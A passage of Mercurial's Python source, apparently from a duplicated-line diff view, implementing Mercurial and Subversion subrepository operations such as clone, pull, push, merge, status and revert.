704 '''read the store hash cache for a given remote repository'''
704 '''read the store hash cache for a given remote repository'''
705 cachefile = _getstorehashcachename(remotepath)
705 cachefile = _getstorehashcachename(remotepath)
706 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
706 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
707
707
708 def _cachestorehash(self, remotepath):
708 def _cachestorehash(self, remotepath):
709 '''cache the current store hash
709 '''cache the current store hash
710
710
711 Each remote repo requires its own store hash cache, because a subrepo
711 Each remote repo requires its own store hash cache, because a subrepo
712 store may be "clean" versus a given remote repo, but not versus another
712 store may be "clean" versus a given remote repo, but not versus another
713 '''
713 '''
714 cachefile = _getstorehashcachename(remotepath)
714 cachefile = _getstorehashcachename(remotepath)
715 with self._repo.lock():
715 with self._repo.lock():
716 storehash = list(self._calcstorehash(remotepath))
716 storehash = list(self._calcstorehash(remotepath))
717 vfs = self._cachestorehashvfs
717 vfs = self._cachestorehashvfs
718 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
718 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
719
719
720 def _getctx(self):
720 def _getctx(self):
721 '''fetch the context for this subrepo revision, possibly a workingctx
721 '''fetch the context for this subrepo revision, possibly a workingctx
722 '''
722 '''
723 if self._ctx.rev() is None:
723 if self._ctx.rev() is None:
724 return self._repo[None] # workingctx if parent is workingctx
724 return self._repo[None] # workingctx if parent is workingctx
725 else:
725 else:
726 rev = self._state[1]
726 rev = self._state[1]
727 return self._repo[rev]
727 return self._repo[rev]
728
728
729 @annotatesubrepoerror
729 @annotatesubrepoerror
730 def _initrepo(self, parentrepo, source, create):
730 def _initrepo(self, parentrepo, source, create):
731 self._repo._subparent = parentrepo
731 self._repo._subparent = parentrepo
732 self._repo._subsource = source
732 self._repo._subsource = source
733
733
734 if create:
734 if create:
735 lines = ['[paths]\n']
735 lines = ['[paths]\n']
736
736
737 def addpathconfig(key, value):
737 def addpathconfig(key, value):
738 if value:
738 if value:
739 lines.append('%s = %s\n' % (key, value))
739 lines.append('%s = %s\n' % (key, value))
740 self.ui.setconfig('paths', key, value, 'subrepo')
740 self.ui.setconfig('paths', key, value, 'subrepo')
741
741
742 defpath = _abssource(self._repo, abort=False)
742 defpath = _abssource(self._repo, abort=False)
743 defpushpath = _abssource(self._repo, True, abort=False)
743 defpushpath = _abssource(self._repo, True, abort=False)
744 addpathconfig('default', defpath)
744 addpathconfig('default', defpath)
745 if defpath != defpushpath:
745 if defpath != defpushpath:
746 addpathconfig('default-push', defpushpath)
746 addpathconfig('default-push', defpushpath)
747
747
748 fp = self._repo.vfs("hgrc", "w", text=True)
748 fp = self._repo.vfs("hgrc", "w", text=True)
749 try:
749 try:
750 fp.write(''.join(lines))
750 fp.write(''.join(lines))
751 finally:
751 finally:
752 fp.close()
752 fp.close()
753
753
754 @annotatesubrepoerror
754 @annotatesubrepoerror
755 def add(self, ui, match, prefix, explicitonly, **opts):
755 def add(self, ui, match, prefix, explicitonly, **opts):
756 return cmdutil.add(ui, self._repo, match,
756 return cmdutil.add(ui, self._repo, match,
757 self.wvfs.reljoin(prefix, self._path),
757 self.wvfs.reljoin(prefix, self._path),
758 explicitonly, **opts)
758 explicitonly, **opts)
759
759
760 @annotatesubrepoerror
760 @annotatesubrepoerror
761 def addremove(self, m, prefix, opts, dry_run, similarity):
761 def addremove(self, m, prefix, opts, dry_run, similarity):
762 # In the same way as sub directories are processed, once in a subrepo,
762 # In the same way as sub directories are processed, once in a subrepo,
763 # always entry any of its subrepos. Don't corrupt the options that will
763 # always entry any of its subrepos. Don't corrupt the options that will
764 # be used to process sibling subrepos however.
764 # be used to process sibling subrepos however.
765 opts = copy.copy(opts)
765 opts = copy.copy(opts)
766 opts['subrepos'] = True
766 opts['subrepos'] = True
767 return scmutil.addremove(self._repo, m,
767 return scmutil.addremove(self._repo, m,
768 self.wvfs.reljoin(prefix, self._path), opts,
768 self.wvfs.reljoin(prefix, self._path), opts,
769 dry_run, similarity)
769 dry_run, similarity)
770
770
771 @annotatesubrepoerror
771 @annotatesubrepoerror
772 def cat(self, match, fm, fntemplate, prefix, **opts):
772 def cat(self, match, fm, fntemplate, prefix, **opts):
773 rev = self._state[1]
773 rev = self._state[1]
774 ctx = self._repo[rev]
774 ctx = self._repo[rev]
775 return cmdutil.cat(self.ui, self._repo, ctx, match, fm, fntemplate,
775 return cmdutil.cat(self.ui, self._repo, ctx, match, fm, fntemplate,
776 prefix, **opts)
776 prefix, **opts)
777
777
778 @annotatesubrepoerror
778 @annotatesubrepoerror
779 def status(self, rev2, **opts):
779 def status(self, rev2, **opts):
780 try:
780 try:
781 rev1 = self._state[1]
781 rev1 = self._state[1]
782 ctx1 = self._repo[rev1]
782 ctx1 = self._repo[rev1]
783 ctx2 = self._repo[rev2]
783 ctx2 = self._repo[rev2]
784 return self._repo.status(ctx1, ctx2, **opts)
784 return self._repo.status(ctx1, ctx2, **opts)
785 except error.RepoLookupError as inst:
785 except error.RepoLookupError as inst:
786 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
786 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
787 % (inst, subrelpath(self)))
787 % (inst, subrelpath(self)))
788 return scmutil.status([], [], [], [], [], [], [])
788 return scmutil.status([], [], [], [], [], [], [])
789
789
790 @annotatesubrepoerror
790 @annotatesubrepoerror
791 def diff(self, ui, diffopts, node2, match, prefix, **opts):
791 def diff(self, ui, diffopts, node2, match, prefix, **opts):
792 try:
792 try:
793 node1 = node.bin(self._state[1])
793 node1 = node.bin(self._state[1])
794 # We currently expect node2 to come from substate and be
794 # We currently expect node2 to come from substate and be
795 # in hex format
795 # in hex format
796 if node2 is not None:
796 if node2 is not None:
797 node2 = node.bin(node2)
797 node2 = node.bin(node2)
798 cmdutil.diffordiffstat(ui, self._repo, diffopts,
798 cmdutil.diffordiffstat(ui, self._repo, diffopts,
799 node1, node2, match,
799 node1, node2, match,
800 prefix=posixpath.join(prefix, self._path),
800 prefix=posixpath.join(prefix, self._path),
801 listsubrepos=True, **opts)
801 listsubrepos=True, **opts)
802 except error.RepoLookupError as inst:
802 except error.RepoLookupError as inst:
803 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
803 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
804 % (inst, subrelpath(self)))
804 % (inst, subrelpath(self)))
805
805
806 @annotatesubrepoerror
806 @annotatesubrepoerror
807 def archive(self, archiver, prefix, match=None, decode=True):
807 def archive(self, archiver, prefix, match=None, decode=True):
808 self._get(self._state + ('hg',))
808 self._get(self._state + ('hg',))
809 total = abstractsubrepo.archive(self, archiver, prefix, match)
809 total = abstractsubrepo.archive(self, archiver, prefix, match)
810 rev = self._state[1]
810 rev = self._state[1]
811 ctx = self._repo[rev]
811 ctx = self._repo[rev]
812 for subpath in ctx.substate:
812 for subpath in ctx.substate:
813 s = subrepo(ctx, subpath, True)
813 s = subrepo(ctx, subpath, True)
814 submatch = matchmod.subdirmatcher(subpath, match)
814 submatch = matchmod.subdirmatcher(subpath, match)
815 total += s.archive(archiver, prefix + self._path + '/', submatch,
815 total += s.archive(archiver, prefix + self._path + '/', submatch,
816 decode)
816 decode)
817 return total
817 return total
818
818
819 @annotatesubrepoerror
819 @annotatesubrepoerror
820 def dirty(self, ignoreupdate=False, missing=False):
820 def dirty(self, ignoreupdate=False, missing=False):
821 r = self._state[1]
821 r = self._state[1]
822 if r == '' and not ignoreupdate: # no state recorded
822 if r == '' and not ignoreupdate: # no state recorded
823 return True
823 return True
824 w = self._repo[None]
824 w = self._repo[None]
825 if r != w.p1().hex() and not ignoreupdate:
825 if r != w.p1().hex() and not ignoreupdate:
826 # different version checked out
826 # different version checked out
827 return True
827 return True
828 return w.dirty(missing=missing) # working directory changed
828 return w.dirty(missing=missing) # working directory changed
829
829
830 def basestate(self):
830 def basestate(self):
831 return self._repo['.'].hex()
831 return self._repo['.'].hex()
832
832
833 def checknested(self, path):
833 def checknested(self, path):
834 return self._repo._checknested(self._repo.wjoin(path))
834 return self._repo._checknested(self._repo.wjoin(path))
835
835
836 @annotatesubrepoerror
836 @annotatesubrepoerror
837 def commit(self, text, user, date):
837 def commit(self, text, user, date):
838 # don't bother committing in the subrepo if it's only been
838 # don't bother committing in the subrepo if it's only been
839 # updated
839 # updated
840 if not self.dirty(True):
840 if not self.dirty(True):
841 return self._repo['.'].hex()
841 return self._repo['.'].hex()
842 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
842 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
843 n = self._repo.commit(text, user, date)
843 n = self._repo.commit(text, user, date)
844 if not n:
844 if not n:
845 return self._repo['.'].hex() # different version checked out
845 return self._repo['.'].hex() # different version checked out
846 return node.hex(n)
846 return node.hex(n)
847
847
848 @annotatesubrepoerror
848 @annotatesubrepoerror
849 def phase(self, state):
849 def phase(self, state):
850 return self._repo[state].phase()
850 return self._repo[state].phase()
851
851
852 @annotatesubrepoerror
852 @annotatesubrepoerror
853 def remove(self):
853 def remove(self):
854 # we can't fully delete the repository as it may contain
854 # we can't fully delete the repository as it may contain
855 # local-only history
855 # local-only history
856 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
856 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
857 hg.clean(self._repo, node.nullid, False)
857 hg.clean(self._repo, node.nullid, False)
858
858
859 def _get(self, state):
859 def _get(self, state):
860 source, revision, kind = state
860 source, revision, kind = state
861 if revision in self._repo.unfiltered():
861 if revision in self._repo.unfiltered():
862 return True
862 return True
863 self._repo._subsource = source
863 self._repo._subsource = source
864 srcurl = _abssource(self._repo)
864 srcurl = _abssource(self._repo)
865 other = hg.peer(self._repo, {}, srcurl)
865 other = hg.peer(self._repo, {}, srcurl)
866 if len(self._repo) == 0:
866 if len(self._repo) == 0:
867 self.ui.status(_('cloning subrepo %s from %s\n')
867 self.ui.status(_('cloning subrepo %s from %s\n')
868 % (subrelpath(self), srcurl))
868 % (subrelpath(self), srcurl))
869 parentrepo = self._repo._subparent
869 parentrepo = self._repo._subparent
870 # use self._repo.vfs instead of self.wvfs to remove .hg only
870 # use self._repo.vfs instead of self.wvfs to remove .hg only
871 self._repo.vfs.rmtree()
871 self._repo.vfs.rmtree()
872 other, cloned = hg.clone(self._repo._subparent.baseui, {},
872 other, cloned = hg.clone(self._repo._subparent.baseui, {},
873 other, self._repo.root,
873 other, self._repo.root,
874 update=False)
874 update=False)
875 self._repo = cloned.local()
875 self._repo = cloned.local()
876 self._initrepo(parentrepo, source, create=True)
876 self._initrepo(parentrepo, source, create=True)
877 self._cachestorehash(srcurl)
877 self._cachestorehash(srcurl)
878 else:
878 else:
879 self.ui.status(_('pulling subrepo %s from %s\n')
879 self.ui.status(_('pulling subrepo %s from %s\n')
880 % (subrelpath(self), srcurl))
880 % (subrelpath(self), srcurl))
881 cleansub = self.storeclean(srcurl)
881 cleansub = self.storeclean(srcurl)
882 exchange.pull(self._repo, other)
882 exchange.pull(self._repo, other)
883 if cleansub:
883 if cleansub:
884 # keep the repo clean after pull
884 # keep the repo clean after pull
885 self._cachestorehash(srcurl)
885 self._cachestorehash(srcurl)
886 return False
886 return False
887
887
888 @annotatesubrepoerror
888 @annotatesubrepoerror
889 def get(self, state, overwrite=False):
889 def get(self, state, overwrite=False):
890 inrepo = self._get(state)
890 inrepo = self._get(state)
891 source, revision, kind = state
891 source, revision, kind = state
892 repo = self._repo
892 repo = self._repo
893 repo.ui.debug("getting subrepo %s\n" % self._path)
893 repo.ui.debug("getting subrepo %s\n" % self._path)
894 if inrepo:
894 if inrepo:
895 urepo = repo.unfiltered()
895 urepo = repo.unfiltered()
896 ctx = urepo[revision]
896 ctx = urepo[revision]
897 if ctx.hidden():
897 if ctx.hidden():
898 urepo.ui.warn(
898 urepo.ui.warn(
899 _('revision %s in subrepository "%s" is hidden\n') \
899 _('revision %s in subrepository "%s" is hidden\n') \
900 % (revision[0:12], self._path))
900 % (revision[0:12], self._path))
901 repo = urepo
901 repo = urepo
902 hg.updaterepo(repo, revision, overwrite)
902 hg.updaterepo(repo, revision, overwrite)
903
903
904 @annotatesubrepoerror
904 @annotatesubrepoerror
905 def merge(self, state):
905 def merge(self, state):
906 self._get(state)
906 self._get(state)
907 cur = self._repo['.']
907 cur = self._repo['.']
908 dst = self._repo[state[1]]
908 dst = self._repo[state[1]]
909 anc = dst.ancestor(cur)
909 anc = dst.ancestor(cur)
910
910
911 def mergefunc():
911 def mergefunc():
912 if anc == cur and dst.branch() == cur.branch():
912 if anc == cur and dst.branch() == cur.branch():
913 self.ui.debug('updating subrepository "%s"\n'
913 self.ui.debug('updating subrepository "%s"\n'
914 % subrelpath(self))
914 % subrelpath(self))
915 hg.update(self._repo, state[1])
915 hg.update(self._repo, state[1])
916 elif anc == dst:
916 elif anc == dst:
917 self.ui.debug('skipping subrepository "%s"\n'
917 self.ui.debug('skipping subrepository "%s"\n'
918 % subrelpath(self))
918 % subrelpath(self))
919 else:
919 else:
920 self.ui.debug('merging subrepository "%s"\n' % subrelpath(self))
920 self.ui.debug('merging subrepository "%s"\n' % subrelpath(self))
921 hg.merge(self._repo, state[1], remind=False)
921 hg.merge(self._repo, state[1], remind=False)
922
922
923 wctx = self._repo[None]
923 wctx = self._repo[None]
924 if self.dirty():
924 if self.dirty():
925 if anc != dst:
925 if anc != dst:
926 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
926 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
927 mergefunc()
927 mergefunc()
928 else:
928 else:
929 mergefunc()
929 mergefunc()
930 else:
930 else:
931 mergefunc()
931 mergefunc()
932
932
933 @annotatesubrepoerror
933 @annotatesubrepoerror
934 def push(self, opts):
934 def push(self, opts):
935 force = opts.get('force')
935 force = opts.get('force')
936 newbranch = opts.get('new_branch')
936 newbranch = opts.get('new_branch')
937 ssh = opts.get('ssh')
937 ssh = opts.get('ssh')
938
938
939 # push subrepos depth-first for coherent ordering
939 # push subrepos depth-first for coherent ordering
940 c = self._repo['']
940 c = self._repo['']
941 subs = c.substate # only repos that are committed
941 subs = c.substate # only repos that are committed
942 for s in sorted(subs):
942 for s in sorted(subs):
943 if c.sub(s).push(opts) == 0:
943 if c.sub(s).push(opts) == 0:
944 return False
944 return False
945
945
946 dsturl = _abssource(self._repo, True)
946 dsturl = _abssource(self._repo, True)
947 if not force:
947 if not force:
948 if self.storeclean(dsturl):
948 if self.storeclean(dsturl):
949 self.ui.status(
949 self.ui.status(
950 _('no changes made to subrepo %s since last push to %s\n')
950 _('no changes made to subrepo %s since last push to %s\n')
951 % (subrelpath(self), dsturl))
951 % (subrelpath(self), dsturl))
952 return None
952 return None
953 self.ui.status(_('pushing subrepo %s to %s\n') %
953 self.ui.status(_('pushing subrepo %s to %s\n') %
954 (subrelpath(self), dsturl))
954 (subrelpath(self), dsturl))
955 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
955 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
956 res = exchange.push(self._repo, other, force, newbranch=newbranch)
956 res = exchange.push(self._repo, other, force, newbranch=newbranch)
957
957
958 # the repo is now clean
958 # the repo is now clean
959 self._cachestorehash(dsturl)
959 self._cachestorehash(dsturl)
960 return res.cgresult
960 return res.cgresult
961
961
962 @annotatesubrepoerror
962 @annotatesubrepoerror
963 def outgoing(self, ui, dest, opts):
963 def outgoing(self, ui, dest, opts):
964 if 'rev' in opts or 'branch' in opts:
964 if 'rev' in opts or 'branch' in opts:
965 opts = copy.copy(opts)
965 opts = copy.copy(opts)
966 opts.pop('rev', None)
966 opts.pop('rev', None)
967 opts.pop('branch', None)
967 opts.pop('branch', None)
968 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
968 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
969
969
970 @annotatesubrepoerror
970 @annotatesubrepoerror
971 def incoming(self, ui, source, opts):
971 def incoming(self, ui, source, opts):
972 if 'rev' in opts or 'branch' in opts:
972 if 'rev' in opts or 'branch' in opts:
973 opts = copy.copy(opts)
973 opts = copy.copy(opts)
974 opts.pop('rev', None)
974 opts.pop('rev', None)
975 opts.pop('branch', None)
975 opts.pop('branch', None)
976 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
976 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
977
977
978 @annotatesubrepoerror
978 @annotatesubrepoerror
979 def files(self):
979 def files(self):
980 rev = self._state[1]
980 rev = self._state[1]
981 ctx = self._repo[rev]
981 ctx = self._repo[rev]
982 return ctx.manifest().keys()
982 return ctx.manifest().keys()
983
983
984 def filedata(self, name, decode):
984 def filedata(self, name, decode):
985 rev = self._state[1]
985 rev = self._state[1]
986 data = self._repo[rev][name].data()
986 data = self._repo[rev][name].data()
987 if decode:
987 if decode:
988 data = self._repo.wwritedata(name, data)
988 data = self._repo.wwritedata(name, data)
989 return data
989 return data
990
990
991 def fileflags(self, name):
991 def fileflags(self, name):
992 rev = self._state[1]
992 rev = self._state[1]
993 ctx = self._repo[rev]
993 ctx = self._repo[rev]
994 return ctx.flags(name)
994 return ctx.flags(name)
995
995
996 @annotatesubrepoerror
996 @annotatesubrepoerror
997 def printfiles(self, ui, m, fm, fmt, subrepos):
997 def printfiles(self, ui, m, fm, fmt, subrepos):
998 # If the parent context is a workingctx, use the workingctx here for
998 # If the parent context is a workingctx, use the workingctx here for
999 # consistency.
999 # consistency.
1000 if self._ctx.rev() is None:
1000 if self._ctx.rev() is None:
1001 ctx = self._repo[None]
1001 ctx = self._repo[None]
1002 else:
1002 else:
1003 rev = self._state[1]
1003 rev = self._state[1]
1004 ctx = self._repo[rev]
1004 ctx = self._repo[rev]
1005 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1005 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1006
1006
1007 @annotatesubrepoerror
1007 @annotatesubrepoerror
1008 def getfileset(self, expr):
1008 def getfileset(self, expr):
1009 if self._ctx.rev() is None:
1009 if self._ctx.rev() is None:
1010 ctx = self._repo[None]
1010 ctx = self._repo[None]
1011 else:
1011 else:
1012 rev = self._state[1]
1012 rev = self._state[1]
1013 ctx = self._repo[rev]
1013 ctx = self._repo[rev]
1014
1014
1015 files = ctx.getfileset(expr)
1015 files = ctx.getfileset(expr)
1016
1016
1017 for subpath in ctx.substate:
1017 for subpath in ctx.substate:
1018 sub = ctx.sub(subpath)
1018 sub = ctx.sub(subpath)
1019
1019
1020 try:
1020 try:
1021 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1021 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1022 except error.LookupError:
1022 except error.LookupError:
1023 self.ui.status(_("skipping missing subrepository: %s\n")
1023 self.ui.status(_("skipping missing subrepository: %s\n")
1024 % self.wvfs.reljoin(reporelpath(self), subpath))
1024 % self.wvfs.reljoin(reporelpath(self), subpath))
1025 return files
1025 return files
1026
1026
1027 def walk(self, match):
1027 def walk(self, match):
1028 ctx = self._repo[None]
1028 ctx = self._repo[None]
1029 return ctx.walk(match)
1029 return ctx.walk(match)
1030
1030
1031 @annotatesubrepoerror
1031 @annotatesubrepoerror
1032 def forget(self, match, prefix):
1032 def forget(self, match, prefix):
1033 return cmdutil.forget(self.ui, self._repo, match,
1033 return cmdutil.forget(self.ui, self._repo, match,
1034 self.wvfs.reljoin(prefix, self._path), True)
1034 self.wvfs.reljoin(prefix, self._path), True)
1035
1035
1036 @annotatesubrepoerror
1036 @annotatesubrepoerror
1037 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1037 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1038 return cmdutil.remove(self.ui, self._repo, matcher,
1038 return cmdutil.remove(self.ui, self._repo, matcher,
1039 self.wvfs.reljoin(prefix, self._path),
1039 self.wvfs.reljoin(prefix, self._path),
1040 after, force, subrepos)
1040 after, force, subrepos)
1041
1041
1042 @annotatesubrepoerror
1042 @annotatesubrepoerror
1043 def revert(self, substate, *pats, **opts):
1043 def revert(self, substate, *pats, **opts):
1044 # reverting a subrepo is a 2 step process:
1044 # reverting a subrepo is a 2 step process:
1045 # 1. if the no_backup is not set, revert all modified
1045 # 1. if the no_backup is not set, revert all modified
1046 # files inside the subrepo
1046 # files inside the subrepo
1047 # 2. update the subrepo to the revision specified in
1047 # 2. update the subrepo to the revision specified in
1048 # the corresponding substate dictionary
1048 # the corresponding substate dictionary
1049 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1049 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1050 if not opts.get('no_backup'):
1050 if not opts.get('no_backup'):
1051 # Revert all files on the subrepo, creating backups
1051 # Revert all files on the subrepo, creating backups
1052 # Note that this will not recursively revert subrepos
1052 # Note that this will not recursively revert subrepos
1053 # We could do it if there was a set:subrepos() predicate
1053 # We could do it if there was a set:subrepos() predicate
1054 opts = opts.copy()
1054 opts = opts.copy()
1055 opts['date'] = None
1055 opts['date'] = None
1056 opts['rev'] = substate[1]
1056 opts['rev'] = substate[1]
1057
1057
1058 self.filerevert(*pats, **opts)
1058 self.filerevert(*pats, **opts)
1059
1059
1060 # Update the repo to the revision specified in the given substate
1060 # Update the repo to the revision specified in the given substate
1061 if not opts.get('dry_run'):
1061 if not opts.get('dry_run'):
1062 self.get(substate, overwrite=True)
1062 self.get(substate, overwrite=True)
1063
1063
1064 def filerevert(self, *pats, **opts):
1064 def filerevert(self, *pats, **opts):
1065 ctx = self._repo[opts['rev']]
1065 ctx = self._repo[opts['rev']]
1066 parents = self._repo.dirstate.parents()
1066 parents = self._repo.dirstate.parents()
1067 if opts.get('all'):
1067 if opts.get('all'):
1068 pats = ['set:modified()']
1068 pats = ['set:modified()']
1069 else:
1069 else:
1070 pats = []
1070 pats = []
1071 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1071 cmdutil.revert(self.ui, self._repo, ctx, parents, *pats, **opts)
1072
1072
1073 def shortid(self, revid):
1073 def shortid(self, revid):
1074 return revid[:12]
1074 return revid[:12]
1075
1075
1076 def verify(self):
1076 def verify(self):
1077 try:
1077 try:
1078 rev = self._state[1]
1078 rev = self._state[1]
1079 ctx = self._repo.unfiltered()[rev]
1079 ctx = self._repo.unfiltered()[rev]
1080 if ctx.hidden():
1080 if ctx.hidden():
1081 # Since hidden revisions aren't pushed/pulled, it seems worth an
1081 # Since hidden revisions aren't pushed/pulled, it seems worth an
1082 # explicit warning.
1082 # explicit warning.
1083 ui = self._repo.ui
1083 ui = self._repo.ui
1084 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1084 ui.warn(_("subrepo '%s' is hidden in revision %s\n") %
1085 (self._relpath, node.short(self._ctx.node())))
1085 (self._relpath, node.short(self._ctx.node())))
1086 return 0
1086 return 0
1087 except error.RepoLookupError:
1087 except error.RepoLookupError:
1088 # A missing subrepo revision may be a case of needing to pull it, so
1088 # A missing subrepo revision may be a case of needing to pull it, so
1089 # don't treat this as an error.
1089 # don't treat this as an error.
1090 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1090 self._repo.ui.warn(_("subrepo '%s' not found in revision %s\n") %
1091 (self._relpath, node.short(self._ctx.node())))
1091 (self._relpath, node.short(self._ctx.node())))
1092 return 0
1092 return 0
1093
1093
1094 @propertycache
1094 @propertycache
1095 def wvfs(self):
1095 def wvfs(self):
1096 """return own wvfs for efficiency and consistency
1096 """return own wvfs for efficiency and consistency
1097 """
1097 """
1098 return self._repo.wvfs
1098 return self._repo.wvfs
1099
1099
1100 @propertycache
1100 @propertycache
1101 def _relpath(self):
1101 def _relpath(self):
1102 """return path to this subrepository as seen from outermost repository
1102 """return path to this subrepository as seen from outermost repository
1103 """
1103 """
1104 # Keep consistent dir separators by avoiding vfs.join(self._path)
1104 # Keep consistent dir separators by avoiding vfs.join(self._path)
1105 return reporelpath(self._repo)
1105 return reporelpath(self._repo)
1106
1106
class svnsubrepo(abstractsubrepo):
    """Subrepository backed by a Subversion working copy."""

    def __init__(self, ctx, path, state, allowcreate):
        super(svnsubrepo, self).__init__(ctx, path)
        self._state = state
        # abort up front if no svn client is available
        self._exe = util.findexe('svn')
        if not self._exe:
            raise error.Abort(_("'svn' executable not found for subrepo '%s'")
                              % self._path)
1115
1115
1116 def _svncommand(self, commands, filename='', failok=False):
1116 def _svncommand(self, commands, filename='', failok=False):
1117 cmd = [self._exe]
1117 cmd = [self._exe]
1118 extrakw = {}
1118 extrakw = {}
1119 if not self.ui.interactive():
1119 if not self.ui.interactive():
1120 # Making stdin be a pipe should prevent svn from behaving
1120 # Making stdin be a pipe should prevent svn from behaving
1121 # interactively even if we can't pass --non-interactive.
1121 # interactively even if we can't pass --non-interactive.
1122 extrakw['stdin'] = subprocess.PIPE
1122 extrakw['stdin'] = subprocess.PIPE
1123 # Starting in svn 1.5 --non-interactive is a global flag
1123 # Starting in svn 1.5 --non-interactive is a global flag
1124 # instead of being per-command, but we need to support 1.4 so
1124 # instead of being per-command, but we need to support 1.4 so
1125 # we have to be intelligent about what commands take
1125 # we have to be intelligent about what commands take
1126 # --non-interactive.
1126 # --non-interactive.
1127 if commands[0] in ('update', 'checkout', 'commit'):
1127 if commands[0] in ('update', 'checkout', 'commit'):
1128 cmd.append('--non-interactive')
1128 cmd.append('--non-interactive')
1129 cmd.extend(commands)
1129 cmd.extend(commands)
1130 if filename is not None:
1130 if filename is not None:
1131 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1131 path = self.wvfs.reljoin(self._ctx.repo().origroot,
1132 self._path, filename)
1132 self._path, filename)
1133 cmd.append(path)
1133 cmd.append(path)
1134 env = dict(encoding.environ)
1134 env = dict(encoding.environ)
1135 # Avoid localized output, preserve current locale for everything else.
1135 # Avoid localized output, preserve current locale for everything else.
1136 lc_all = env.get('LC_ALL')
1136 lc_all = env.get('LC_ALL')
1137 if lc_all:
1137 if lc_all:
1138 env['LANG'] = lc_all
1138 env['LANG'] = lc_all
1139 del env['LC_ALL']
1139 del env['LC_ALL']
1140 env['LC_MESSAGES'] = 'C'
1140 env['LC_MESSAGES'] = 'C'
1141 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1141 p = subprocess.Popen(cmd, bufsize=-1, close_fds=util.closefds,
1142 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1142 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
1143 universal_newlines=True, env=env, **extrakw)
1143 universal_newlines=True, env=env, **extrakw)
1144 stdout, stderr = p.communicate()
1144 stdout, stderr = p.communicate()
1145 stderr = stderr.strip()
1145 stderr = stderr.strip()
1146 if not failok:
1146 if not failok:
1147 if p.returncode:
1147 if p.returncode:
1148 raise error.Abort(stderr or 'exited with code %d'
1148 raise error.Abort(stderr or 'exited with code %d'
1149 % p.returncode)
1149 % p.returncode)
1150 if stderr:
1150 if stderr:
1151 self.ui.warn(stderr + '\n')
1151 self.ui.warn(stderr + '\n')
1152 return stdout, stderr
1152 return stdout, stderr
1153
1153
1154 @propertycache
1154 @propertycache
1155 def _svnversion(self):
1155 def _svnversion(self):
1156 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1156 output, err = self._svncommand(['--version', '--quiet'], filename=None)
1157 m = re.search(r'^(\d+)\.(\d+)', output)
1157 m = re.search(r'^(\d+)\.(\d+)', output)
1158 if not m:
1158 if not m:
1159 raise error.Abort(_('cannot retrieve svn tool version'))
1159 raise error.Abort(_('cannot retrieve svn tool version'))
1160 return (int(m.group(1)), int(m.group(2)))
1160 return (int(m.group(1)), int(m.group(2)))
1161
1161
1162 def _wcrevs(self):
1162 def _wcrevs(self):
1163 # Get the working directory revision as well as the last
1163 # Get the working directory revision as well as the last
1164 # commit revision so we can compare the subrepo state with
1164 # commit revision so we can compare the subrepo state with
1165 # both. We used to store the working directory one.
1165 # both. We used to store the working directory one.
1166 output, err = self._svncommand(['info', '--xml'])
1166 output, err = self._svncommand(['info', '--xml'])
1167 doc = xml.dom.minidom.parseString(output)
1167 doc = xml.dom.minidom.parseString(output)
1168 entries = doc.getElementsByTagName('entry')
1168 entries = doc.getElementsByTagName('entry')
1169 lastrev, rev = '0', '0'
1169 lastrev, rev = '0', '0'
1170 if entries:
1170 if entries:
1171 rev = str(entries[0].getAttribute('revision')) or '0'
1171 rev = str(entries[0].getAttribute('revision')) or '0'
1172 commits = entries[0].getElementsByTagName('commit')
1172 commits = entries[0].getElementsByTagName('commit')
1173 if commits:
1173 if commits:
1174 lastrev = str(commits[0].getAttribute('revision')) or '0'
1174 lastrev = str(commits[0].getAttribute('revision')) or '0'
1175 return (lastrev, rev)
1175 return (lastrev, rev)
1176
1176
1177 def _wcrev(self):
1177 def _wcrev(self):
1178 return self._wcrevs()[0]
1178 return self._wcrevs()[0]
1179
1179
1180 def _wcchanged(self):
1180 def _wcchanged(self):
1181 """Return (changes, extchanges, missing) where changes is True
1181 """Return (changes, extchanges, missing) where changes is True
1182 if the working directory was changed, extchanges is
1182 if the working directory was changed, extchanges is
1183 True if any of these changes concern an external entry and missing
1183 True if any of these changes concern an external entry and missing
1184 is True if any change is a missing entry.
1184 is True if any change is a missing entry.
1185 """
1185 """
1186 output, err = self._svncommand(['status', '--xml'])
1186 output, err = self._svncommand(['status', '--xml'])
1187 externals, changes, missing = [], [], []
1187 externals, changes, missing = [], [], []
1188 doc = xml.dom.minidom.parseString(output)
1188 doc = xml.dom.minidom.parseString(output)
1189 for e in doc.getElementsByTagName('entry'):
1189 for e in doc.getElementsByTagName('entry'):
1190 s = e.getElementsByTagName('wc-status')
1190 s = e.getElementsByTagName('wc-status')
1191 if not s:
1191 if not s:
1192 continue
1192 continue
1193 item = s[0].getAttribute('item')
1193 item = s[0].getAttribute('item')
